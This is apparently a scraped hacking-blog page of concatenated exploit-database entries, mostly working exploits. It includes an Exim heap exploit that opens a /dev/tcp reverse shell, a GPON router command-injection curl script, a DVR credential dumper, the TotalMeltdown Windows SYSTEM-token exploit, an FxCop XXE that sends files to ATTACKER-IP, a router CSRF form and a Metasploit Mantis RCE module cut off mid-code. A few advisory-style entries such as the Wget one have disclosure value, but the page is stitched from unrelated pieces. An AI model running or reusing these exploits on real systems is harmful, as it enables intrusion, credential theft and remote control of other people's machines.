#!/usr/bin/python
import time
import socket
import struct
s = None
f = None
def logo():
print
print " CVE-2018-6789 Poc Exploit"
print "@straight_blast ; straightblast426@gmail.com"
print
def connect(host, port):
global s
global f
s = socket.create_connection((host,port))
f = s.makefile('rw', bufsize=0)
def p(v):
return struct.pack("<Q", v)
def readuntil(delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
return data
def write(data):
f.write(data + "\n")
def ehlo(v):
write("EHLO " + v)
readuntil('HELP')
def unrec(v):
write(v)
readuntil('command')
def auth_plain(v):
encode = v.encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode)
readuntil('data')
def one_byte_overwrite():
v = "C" * 8200
encode = v.encode('base64').replace('\n','').replace('=','')
encode = encode[:-1] + "PE"
write("AUTH PLAIN " + encode)
readuntil('data')
def exploit():
logo()
connect('localhost', 25)
print "[1] connected to target"
time.sleep(0.5)
ehlo("A" * 8000)
ehlo("B" * 16)
print "[2] created free chunk size 0x6060 in unsorted bin"
unrec("\xff" * 2000)
ehlo("D" * 8200)
one_byte_overwrite()
print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"
fake_header = p(0)
fake_header += p(0x1f51)
auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))
print "[4] patched chunk with fake header so extended chunk can be freed"
ehlo("F" * 16)
print "[5] freed extended chunk"
unrec("\xff" * 2000)
unrec("\xff" * 2000)
print "[6] occupied 1st and 3rd item in unsorted bin with fillers"
fake_header = p(0x4110)
fake_header += p(0x1f50)
auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))
print "[7] patched chunk with fake header so extended chunk can be allocated"
address = 0x55d7e5864480
auth_plain("H" * 8200 + p(0x2021) + p(address) + p(0x2008) + "H" * 184)
print "[8] overwrite 'next' pointer with ACL store block address"
ehlo("I" * 16)
print "[9] freed the ACL store block"
acl_smtp_rcpt_offset = 288
local_host = '192.168.0.159'
local_port = 1337
cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
cmd_expansion_string = "${run{" + cmd + "}}\0"
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"
write("MAIL FROM:<test@pwned.com>")
readuntil("OK")
write("RCPT TO:<shell@pwned.com>")
print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
print
if __name__ == '__main__':
exploit()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863569164
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234)
For more information read
[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).
To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).
In order to use the script, we will need to set all dependencies in a advance:
```shell
$ pip install -r ./requirements.txt
```
With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
functions properly.
1. Restart the router to provide access to the engineering page.
2. Start the PoC on behalf of the root user (required for operating with
Bluetooth) with the command on executing as an argument:
```shell
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
```
After the script is successfully executed, we get access to the device via
the SSH connection. We put `root` as a user and `admin` as password:
```shell
$ ssh root@norton.core
```
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44574.zip
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by InsertScript
%PDF-1. % can be truncated to %PDF-\0
1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config>
<template>
<subform name="_">
<pageSet/>
<field id="Hello World!">
<event activity="docReady" ref="$host" name="event__click">
<submit
textEncoding="UTF-16
test: test
"
xdpContent="pdf datasets xfdf"
target="http://example.com/test"/>
</event>
</field>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer <<
/Root <<
/AcroForm <<
/Fields [<<
/T (0)
/Kids [<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
>>]
>>]
/XFA 1 0 R
>>
/Pages <<>>
>>
>>
# -*- coding: utf-8 -*-
import json
import requests
import argparse
import tableprint as tp
class Colors:
BLUE = '\033[94m'
GREEN = '\033[32m'
RED = '\033[0;31m'
DEFAULT = '\033[0m'
ORANGE = '\033[33m'
WHITE = '\033[97m'
BOLD = '\033[1m'
BR_COLOUR = '\033[1;37;40m'
banner = '''
__..--.._
..... .--~ ..... `.
.": "`-.. . .' ..-'" :". `
` `._ ` _.'`"( `-"'`._ ' _.' '
~~~ `. ~~~
.'
/
(
^---'
[*] @capitan_alfa
'''
details = '''
# Exploit Title: DVRs; Credentials Exposed
# Date: 09/04/2018
# Exploit Author: Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
description=' [+] Obtaining Exposed credentials',
epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
version="1.1")
parser.add_argument('--host', dest="HOST", help='Host', required=True)
parser.add_argument('--port', dest="PORT", help='Port', default=80)
args = parser.parse_args()
HST = args.HOST
port = args.PORT
headers = {}
fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host = "http://"+HST+":"+str(port)+"/"
print Colors.GREEN+banner+Colors.DEFAULT
def makeReqHeaders(xCookie):
headers["Host"] = host
headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"
headers["Connection"] = "close"
headers["Content-Type"] = "text/html"
headers["Cookie"] = "uid="+xCookie
return headers
try:
rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
exit()
badJson = rX.text
try:
dataJson = json.loads(badJson)
totUsr = len(dataJson["list"]) #--> 10
except Exception, e:
print " [+] Error: "+str(e)
print " [>] json: "+str(rX)
# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
exit()
print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT
print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "
final_data = []
try:
for obj in range(0,totUsr):
temp = []
_usuario = dataJson["list"][obj]["uid"]
_password = dataJson["list"][obj]["pwd"]
_role = dataJson["list"][obj]["role"]
temp.append(_usuario)
temp.append(_password)
temp.append(_role)
final_data.append(temp)
hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT
hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT
cabeceras = [hdUsr, hdPass, hdRole]
tp.table(final_data, cabeceras, width=20)
except Exception, e:
print "\n [!]: "+str(e)
print " [+] "+ str(dataJson)
print "\n"
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
struct sockaddr_llc {
short sllc_family;
short sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[2];
};
void test()
{
int fd = socket(AF_LLC, SOCK_STREAM, 0);
char output[32] = "lo";
socklen_t len;
setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));
char msg[0x10] = "aaaa";
send(fd, msg, 0x10, 0);
}
int main()
{
test();
return 0;
}
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
“The DCS-5020L Wireless N Day & Night Pan/Tilt Cloud Camera is a day/night network camera that easily connects to your existing home network for remote viewing on a range of mobile devices. It features pan, tilt and digital zoom function to allow you to see a wider area with a single camera, built-in Wi-Fi extender to effortlessly expand your wireless coverage, night vision up to 5 metres, sound and motion detection for the ultimate in peace of mind, and H.264 video compression for a high-quality image.”
This walkthrough demonstrates just how easy it can be to find vulnerabilities in Internet of Things (IOT) devices. The process of finding the following command injection can be broken down into 3 steps that are more akin to a 100 point CTF challenge: download binary, run strings, trace input to system call to origin.
An attacker can escape the ‘sed’ command with a simple payload, such as ‘`touch a`’. Another example that fits is AdminID=a’`telnetd`’, which allows a user to login as “a”, which becomes the new root account:
Source: https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/
#include "stdafx.h"
#define PML4_BASE 0xFFFFF6FB7DBED000
#define PDP_BASE 0xFFFFF6FB7DA00000
#define PD_BASE 0xFFFFF6FB40000000
#define PT_BASE 0xFFFFF68000000000
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
#pragma pack(push,4)
typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {
UCHAR Type;
UCHAR ShareDisposition;
USHORT Flags;
union {
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Generic;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Port;
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Level;
USHORT Group;
#else
ULONG Level;
#endif
ULONG Vector;
KAFFINITY Affinity;
} Interrupt;
struct {
union {
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Group;
#else
USHORT Reserved;
#endif
USHORT MessageCount;
ULONG Vector;
KAFFINITY Affinity;
} Raw;
struct {
#if defined(NT_PROCESSOR_GROUPS)
USHORT Level;
USHORT Group;
#else
ULONG Level;
#endif
ULONG Vector;
KAFFINITY Affinity;
} Translated;
} DUMMYUNIONNAME;
} MessageInterrupt;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length;
} Memory;
struct {
ULONG Channel;
ULONG Port;
ULONG Reserved1;
} Dma;
struct {
ULONG Channel;
ULONG RequestLine;
UCHAR TransferWidth;
UCHAR Reserved1;
UCHAR Reserved2;
UCHAR Reserved3;
} DmaV3;
struct {
ULONG Data[3];
} DevicePrivate;
struct {
ULONG Start;
ULONG Length;
ULONG Reserved;
} BusNumber;
struct {
ULONG DataSize;
ULONG Reserved1;
ULONG Reserved2;
} DeviceSpecificData;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length40;
} Memory40;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length48;
} Memory48;
struct {
PHYSICAL_ADDRESS Start;
ULONG Length64;
} Memory64;
struct {
UCHAR Class;
UCHAR Type;
UCHAR Reserved1;
UCHAR Reserved2;
ULONG IdLowPart;
ULONG IdHighPart;
} Connection;
} u;
} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;
#pragma pack(pop,4)
typedef enum _INTERFACE_TYPE {
InterfaceTypeUndefined,
Internal,
Isa,
Eisa,
MicroChannel,
TurboChannel,
PCIBus,
VMEBus,
NuBus,
PCMCIABus,
CBus,
MPIBus,
MPSABus,
ProcessorInternal,
InternalPowerBus,
PNPISABus,
PNPBus,
Vmcs,
ACPIBus,
MaximumInterfaceType
} INTERFACE_TYPE, *PINTERFACE_TYPE;
typedef struct _CM_PARTIAL_RESOURCE_LIST {
USHORT Version;
USHORT Revision;
ULONG Count;
CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];
} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;
typedef struct _CM_FULL_RESOURCE_DESCRIPTOR {
INTERFACE_TYPE InterfaceType;
ULONG BusNumber;
CM_PARTIAL_RESOURCE_LIST PartialResourceList;
} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;
typedef struct _CM_RESOURCE_LIST {
ULONG Count;
CM_FULL_RESOURCE_DESCRIPTOR List[1];
} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;
struct memory_region {
ULONG64 size;
ULONG64 address;
};
// Very hack'y way of trying to map out physical memory regions to try and reduce
// risk of BSOD
DWORD parse_memory_map(struct memory_region *regions) {
HKEY hKey = NULL;
LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory";
LPTSTR pszValueName = L".Translated";
LPBYTE lpData = NULL;
DWORD dwLength = 0, count = 0, type = 0;;
if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)
{
printf("[*] Could not get reg key\n");
return 0;
}
if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)
{
printf("[*] Could not query hardware key\n");
return 0;
}
lpData = (LPBYTE)malloc(dwLength);
RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);
CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;
for (int i = 0; i < resource_list->Count; i++) {
for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {
if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {
regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;
regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;
regions++;
count++;
}
}
}
return count;
}
int main()
{
printf("TotalMeltdown PrivEsc exploit by @_xpn_\n");
printf(" paging code by @UlfFrisk\n\n");
unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;
DWORD done;
DWORD count;
// Parse registry for physical memory regions
printf("[*] Getting physical memory regions from registry\n");
struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);
count = parse_memory_map(regions);
if (count == 0) {
printf("[X] Could not find physical memory region, quitting\n");
return 2;
}
for (int i = 0; i < count; i++) {
printf("[*] Phyiscal memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size);
}
// Check for vulnerability
__try {
int test = *(unsigned long long *)PML4_BASE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Could not access PML4 address, system likely not vulnerable\n");
return 2;
}
// setup: PDPT @ fixed hi-jacked physical address: 0x10000
// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry
// we can hijack.
for (iPML4 = 256; iPML4 < 512; iPML4++) {
vaPML4e = PML4_BASE + (iPML4 << 3);
if (*(unsigned long long *)vaPML4e) { continue; }
// When we find an entry, we add a pointer to the next table (PDPT), which will be
// stored at the physical address 0x10000
*(unsigned long long *)vaPML4e = 0x10067;
break;
}
printf("[*] PML4 Entry Added At Index: %d\n", iPML4);
// Here, the PDPT table is referenced via a virtual address.
// For example, if we added our hijacked PML4 entry at index 256, this virtual address
// would be 0xFFFFF6FB7DA00000 + 0x100000
// This allows us to reference the physical address 0x10000 as:
// PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100
vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));
printf("[*] PDPT Virtual Address: %p", vaPDPT);
// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages
// Below is responsible for adding 31 entries to the PDPT
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
*(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);
}
// For each of the PDs, a further 512 PT's are created. This gives access to
// 512 * 32 * 2mb = 33gb physical memory space
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
if ((iPDPT % 3) == 0)
printf("\n[*] PD Virtual Addresses: ");
vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));
printf("%p ", vaPD);
for (iPD = 0; iPD < 512; iPD++) {
// Below, notice the 0xe7 flags added to each entry.
// This is used to create a 2mb page rather than the standard 4096 byte page.
*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;
}
}
printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n");
#define EPROCESS_IMAGENAME_OFFSET 0x2e0
#define EPROCESS_TOKEN_OFFSET 0x208
#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base
unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;
unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
printf("[*] Hunting for _EPROCESS structures in memory\n");
for (int j = 0; j < count; j++) {
printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size);
for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {
__try {
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS);
}
}
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS);
}
}
if (systemEPROCESS != 0 && ourEPROCESS != 0) {
// Swap the tokens by copying the pointer to System Token field over our process token
printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);
*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);
printf("[*] Done, spawning SYSTEM shell...\n\n");
CreateProcessA(0,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
NULL,
"C:\\windows\\system32",
&si,
&pi);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Exception occured, stopping to avoid BSOD\n");
return 2;
}
}
}
return 0;
}
# Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection
# Date: 2018-03-15
# Exploit Author: Debashis Pal
# Vendor Homepage: www.microsoft.com
# Version: Microsoft Windows "FxCop" v10-12
# CVE : N/A
***Greetz: indoushka|Eduardo|Dirty0tis***
Security Issue:
================
FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both.
If you have the the particular SDK in question it is probably there but needs to be installed as it was for me.
MSRC Response:
=============
"Weíve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0 as far as SDKs are concerned, with version 13.0 skipped).
We have confirmation that the SDKs for Win8+ donít ship FxCop
We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run
after an SDKís install (if even feasible) would just draw attention to the problem.
Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected.
In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability."
Exploit/POC:
=============
1) python -m SimpleHTTPServer
2) "POC.FxCop"
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8000/payload.dtd">
%dtd;]>
<FxCopProject Version="1.36" Name="My FxCop Project">&send;</FxCopProject>
3) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8000?%file;'>">
%all;
4) Import or Open "POC.FxCop" file in FxCop
Files get exfiltrated to attacker server.
Disclosure Timeline:
=============================
Vendor Notification: March 15, 2018
Vendor opens MSRC Case 44322?: March 16, 2018
Vendor reproduces issue : April 6, 2018
Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
May 9, 2018 : Public Disclosure
###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################
#!/usr/bin/python
buffer = "A" * 780
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
GNU Wget Cookie Injection [CVE-2018-0494]
=========================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt
Overview
--------
GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
the cookie jar file.
Description
-----------
Normally a website should not be able to set cookies for other domains. Due to
insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
values to the cookie jar file, bypassing this security restriction.
Impact
------
An external attacker is able to inject arbitrary cookie values cookie jar file,
adding new or replacing existing cookie values.
Details
-------
The discovered vulnerability, described in more detail below, enables the attack
described here in brief.
1. The attacker controlled web site sends a specially crafted Set-Cookie -header
to inject a new authentication cookie for example.com, replacing the existing
one. In order to be successful the victim must perform a wget operation on the
attacker controller site, for example:
wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
2. Victim uses wget to post some secret the the api.example.com:
wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload
Since the attacker was able to replace the authentication cookie for example.com,
the secret.txt data will be posted to attacker's account instead to that of the
victim.
Vulnerabilities
---------------
1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]
The cookie parsing implementation does too lax input validation when parsing the
Set-Cookie response from the server. Consider the following malicious response:
HTTP/1.1 200 OK
Content-Length: 0
Set-Cookie: foo="bar
.google.com TRUE / FALSE 1900000000 injected cookie
";expires=Thursday, 01-Jan-2032 08:00:00 GMT
When parsed by Wget and stored to a cookie jar file it will appear as:
# HTTP cookie file.
# Generated by Wget on 2018-04-27 23:28:21.
# Edit at your own risk.
127.0.0.1:7777 FALSE / FALSE 1956556800 foo "bar
.google.com TRUE / FALSE 1900000000 injected cookie
"
Since the Wget cookie jar parser skips any leading spaces, the .google.com line
will be picked up.
Note: The order in which the hosts/domains are stored in the cookie jar is derived
from the hashing function used to speed up the lookups. If an existing cookie is
to be replaced the server hostname used to serve the Set-Cookie will need to be
carefully chosen to result in hash entry below the targeted domain. If not done,
the original cookie will be used instead of the injected one.
Proof of Concept
----------------
1. Set up a minimal web server, good for 1 request:
$ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie:
foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00
GMT\r\n\r\n' | nc -v -l 7777
2. Fetch the evil url:
$ wget --save-cookies jar.txt http://127.0.0.1:7777/plop
3. Examine the resulting cookie jar file:
$ cat jar.txt
Vulnerable versions
-------------------
The following GNU Wget versions are confirmed vulnerable:
- 1.7 thru 1.19.4
Mitigation
----------
1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package
in your distribution
Credits
-------
The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
2018.04.26 discovered & reported the vulnerability
2018.04.27 CVE-2018-0494 assigned
2018.05.06 GNU Wget 1.19.5 released with the fix
2018.05.06 public disclosure of the advisory
# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023
I DESCRIPTION
========================================================================
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
The vulnerability was disclosed to Fastweb on 19 January 2018.
Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
II PROOF OF CONCEPT
========================================================================
## Activate Gues Wi-Fi:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.254/status.cgi">
<input type="hidden" name="_" value="1516312144136" />
<input type="hidden" name="act" value="nvset" />
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />
<input type="hidden" name="hotspot_enable" value="1" />
<input type="hidden" name="hotspot_filtering" value="all" />
<input type="hidden" name="hotspot_security" value="WPA2PSK" />
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />
<input type="hidden" name="hotspot_timeout" value="-1" />
<input type="hidden" name="service" value="wl_guestaccess" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Mantis manage_proj_page PHP Code Execution',
'Description' => %q{
Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
Code Execution vulnerability in the sort parameter of the
manage_proj_page.php page.
},
'Author' => [
'EgiX', # Exploit-DB Entry Author
'Lars Sorenson' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '6768'],
['CVE', '2008-4687'],
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Mantis <= 1.1.3', { } ],
],
'DisclosureDate' => 'Oct 16, 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
])
end
def check
vprint_status('Checking Mantis version ...')
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
'method' => 'GET'
})
unless res
vprint_error('Connection to host failed!')
return CheckCode::Unknown
end
unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
vprint_error('Cannot determine Mantis version!')
return CheckCode::Unknown
end
version = Gem::Version.new(Regexp.last_match[1])
vprint_status("Mantis version #{version} detected")
if res.code == 200 && version <= Gem::Version.new('1.1.3')
return CheckCode::Appears
end
CheckCode::Safe
end
def login
vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
})
unless res
fail_with(Failure::Unreachable, 'Cannot access host to log in!')
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login.php'),
'method' => 'POST',
'vars_post' => {
'username': datastore['username'],
'password': datastore['password'],
},
'cookie'=> "PHPSESSID=#{res.get_cookies}"
})
unless res
fail_with(Failure::Unknown, 'Cannot access host to log in!')
end
fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
res.get_cookies
end
def exploit
fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
cookie = login
vprint_status('Sending payload ...')
payload_b64 = Rex::Text.encode_base64(payload.encoded)
data = {
'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'),
